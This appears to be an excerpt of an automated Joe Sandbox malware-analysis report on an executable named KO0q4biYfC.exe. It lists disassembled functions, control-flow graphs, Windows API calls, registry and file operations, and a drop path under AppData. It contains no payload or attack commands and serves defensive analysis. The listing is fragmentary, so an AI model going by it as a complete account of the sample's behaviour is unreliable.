                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp$C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll$C:\Users\user\AppData\Roaming\brugser\brugo$Call
                                              • API String ID: 1941528284-2804879308
                                              • Opcode ID: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                              • Opcode Fuzzy Hash: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 846 405450-405465 847 40546b-40547c 846->847 848 40551c-405520 846->848 849 405487-405493 lstrlenW 847->849 850 40547e-405482 call 40640a 847->850 852 4054b0-4054b4 849->852 853 405495-4054a5 lstrlenW 849->853 850->849 855 4054c3-4054c7 852->855 856 4054b6-4054bd SetWindowTextW 852->856 853->848 854 4054a7-4054ab lstrcatW 853->854 854->852 857 4054c9-40550b SendMessageW * 3 855->857 858 40550d-40550f 855->858 856->855 857->858 858->848 859 405511-405514 858->859 859->848
                                              APIs
                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                              • lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                              • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll
                                              • API String ID: 2531174081-558231553
                                              • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                              • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 860 40264a-402663 call 402c1f 863 402ac5-402ac8 860->863 864 402669-402670 860->864 865 402ace-402ad4 863->865 866 402672 864->866 867 402675-402678 864->867 866->867 869 4027dc-4027e4 867->869 870 40267e-40268d call 406348 867->870 869->863 870->869 873 402693 870->873 874 402699-40269d 873->874 875 402732-402735 874->875 876 4026a3-4026be ReadFile 874->876 877 402737-40273a 875->877 878 40274d-40275d call 405f61 875->878 876->869 879 4026c4-4026c9 876->879 877->878 880 40273c-402747 call 405fbf 877->880 878->869 888 40275f 878->888 879->869 882 4026cf-4026dd 879->882 880->869 880->878 883 4026e3-4026f5 MultiByteToWideChar 882->883 884 402798-4027a4 call 40632f 882->884 887 4026f7-4026fa 883->887 883->888 884->865 891 4026fc-402707 887->891 893 402762-402765 888->893 891->893 894 402709-40272e SetFilePointer MultiByteToWideChar 891->894 893->884 895 402767-40276c 893->895 894->891 898 402730 894->898 896 4027a9-4027ad 895->896 897 40276e-402773 895->897 900 4027ca-4027d6 SetFilePointer 896->900 901 4027af-4027b3 896->901 897->896 899 402775-402788 897->899 898->888 899->869 902 40278a-402790 899->902 900->869 903 4027b5-4027b9 901->903 904 4027bb-4027c8 901->904 902->874 905 402796 902->905 903->900 903->904 904->869 905->869
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                              • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 906 406752-406772 GetSystemDirectoryW 907 406774 906->907 908 406776-406778 906->908 907->908 909 406789-40678b 908->909 910 40677a-406783 908->910 912 40678c-4067bf wsprintfW LoadLibraryExW 909->912 910->909 911 406785-406787 910->911 911->912
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                              • wsprintfW.USER32 ref: 004067A4
                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 913 40591f-40596a CreateDirectoryW 914 405970-40597d GetLastError 913->914 915 40596c-40596e 913->915 916 405997-405999 914->916 917 40597f-405993 SetFileSecurityW 914->917 915->916 917->915 918 405995 GetLastError 917->918 918->916
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                              • GetLastError.KERNEL32 ref: 00405976
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                              • GetLastError.KERNEL32 ref: 00405995
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 3449924974-3976562730
                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 919 405f0d-405f19 920 405f1a-405f4e GetTickCount GetTempFileNameW 919->920 921 405f50-405f52 920->921 922 405f5d-405f5f 920->922 921->920 923 405f54 921->923 924 405f57-405f5a 922->924 923->924
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\KO0q4biYfC.exe",004034A3,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF), ref: 00405F46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-1427818558
                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 925 73c61777-73c617b6 call 73c61b5f 929 73c618d6-73c618d8 925->929 930 73c617bc-73c617c0 925->930 931 73c617c2-73c617c8 call 73c62352 930->931 932 73c617c9-73c617d6 call 73c62394 930->932 931->932 937 73c61806-73c6180d 932->937 938 73c617d8-73c617dd 932->938 939 73c6180f-73c6182b call 73c62569 call 73c615b4 call 73c61272 GlobalFree 937->939 940 73c6182d-73c61831 937->940 941 73c617df-73c617e0 938->941 942 73c617f8-73c617fb 938->942 963 73c61885-73c61889 939->963 946 73c61833-73c6187c call 73c615c6 call 73c62569 940->946 947 73c6187e-73c61884 call 73c62569 940->947 944 73c617e2-73c617e3 941->944 945 73c617e8-73c617e9 call 73c62aac 941->945 942->937 948 73c617fd-73c617fe call 73c62d37 942->948 952 73c617e5-73c617e6 944->952 953 73c617f0-73c617f6 call 73c62724 944->953 959 73c617ee 945->959 946->963 947->963 956 73c61803 948->956 952->937 952->945 962 73c61805 953->962 956->962 959->956 962->937 968 73c618c6-73c618cd 963->968 969 73c6188b-73c61899 call 73c6252c 963->969 968->929 971 73c618cf-73c618d0 GlobalFree 968->971 975 73c618b1-73c618b8 969->975 976 73c6189b-73c6189e 969->976 971->929 975->968 978 73c618ba-73c618c5 call 73c6153d 975->978 976->975 977 73c618a0-73c618a8 976->977 977->975 979 73c618aa-73c618ab FreeLibrary 977->979 978->968 979->975
                                              APIs
                                                • Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DB2
                                                • Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DB7
                                                • Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DBC
                                              • GlobalFree.KERNEL32(00000000), ref: 73C61825
                                              • FreeLibrary.KERNEL32(?), ref: 73C618AB
                                              • GlobalFree.KERNEL32(00000000), ref: 73C618D0
                                                • Part of subcall function 73C62352: GlobalAlloc.KERNEL32(?,?), ref: 73C62383
                                                • Part of subcall function 73C62724: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,73C617F6,00000000), ref: 73C627F4
                                                • Part of subcall function 73C615C6: wsprintfW.USER32 ref: 73C615F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                              • String ID:
                                              • API String ID: 3962662361-3916222277
                                              • Opcode ID: 9c1dcaddb4942bc2e8350a918188658c6964e2038a19e9438bc79857131ea9da
                                              • Instruction ID: b79b6c05c63af96668857c6e8a55891e9c2f64497586248832ec09e8ba4eaa93
                                              • Opcode Fuzzy Hash: 9c1dcaddb4942bc2e8350a918188658c6964e2038a19e9438bc79857131ea9da
                                              • Instruction Fuzzy Hash: 3541A072400388EBDB11AF6198D4B9637BCBF08312F1A5065EA0BDE1C6DB78C584C761

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 982 4023e4-40240b call 402c41 * 2 call 402cd1 988 402410-402415 982->988 989 402ac5-402ad4 988->989 990 40241b-402425 988->990 992 402427-402434 call 402c41 lstrlenW 990->992 993 402438-40243b 990->993 992->993 996 40243d-40244e call 402c1f 993->996 997 40244f-402452 993->997 996->997 998 402463-402477 RegSetValueExW 997->998 999 402454-40245e call 4031d6 997->999 1003 402479 998->1003 1004 40247c-40255d RegCloseKey 998->1004 999->998 1003->1004 1004->989 1007 40288b-402892 1004->1007 1007->989
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000023,00000011,00000002), ref: 0040242F
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000000,00000011,00000002), ref: 0040246F
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000000,00000011,00000002), ref: 00402557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp
                                              • API String ID: 2655323295-60209605
                                              • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                              • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                              • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                              • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                              APIs
                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brugser\brugo,?,00000000,?), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\brugser\brugo
                                              • API String ID: 1892508949-2288025642
                                              • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                              • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                              • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                              • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
